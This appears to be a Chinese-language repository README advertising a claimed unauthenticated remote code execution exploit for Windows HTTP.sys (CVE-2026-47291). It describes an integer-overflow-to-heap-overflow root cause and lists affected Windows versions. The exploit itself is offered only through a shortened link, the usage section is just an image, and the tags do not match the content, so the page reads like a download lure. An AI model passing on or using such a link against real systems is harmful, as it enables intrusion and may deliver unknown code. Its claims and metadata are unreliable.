ManagerEmpty/CVE-2026-47291-httpsys

## CVE-2026-47291 ### 概述 针对 CVE-2026-47291 的 RCE 漏洞利用，目标为 Windows HTTP.sys。通过请求处理中的整数溢出触发基于堆的缓冲区溢出。仅需一个特制的数据包即可在 HTTP.sys 上下文中实现任意代码执行。无需身份验证。 已在 Windows 10/11 以及 2026 年 6 月补丁之前的 Server 版本上进行了测试。 ### 受影响版本 | 操作系统 | 版本 | |----|----------| | Windows 10 | 21H2, 22H2, 1607, 1809 | | Windows 11 | 23H2, 24H2, 25H2, 26H1 | | Windows Server | 2012 / 2012 R2 / 2016 / 2019 / 2022 / 2025（补丁前） | ### 根本原因 HTTP.sys 在处理 Content-Length 和 chunked 编码时发生的整数溢出（CWE-190）导致缓冲区分配不足。随后的 memcpy 风格操作导致堆溢出（CWE-122），允许对相邻结构进行受控覆盖并可靠地控制 RIP。 ### 使用方法 [](https://postimg.cc/7J2kv6FP) ### 漏洞利用 [链接](https://tinyurl.com/3te2nubh) ### 免责声明 本漏洞利用程序仅用于授权的渗透测试、红队演练，以及针对您拥有或获得明确测试许可的系统的安全研究。严禁未经授权使用。使用风险由您自行承担。

标签：UML, Web报告查看器, XXE攻击, 内核漏洞, 缓冲区溢出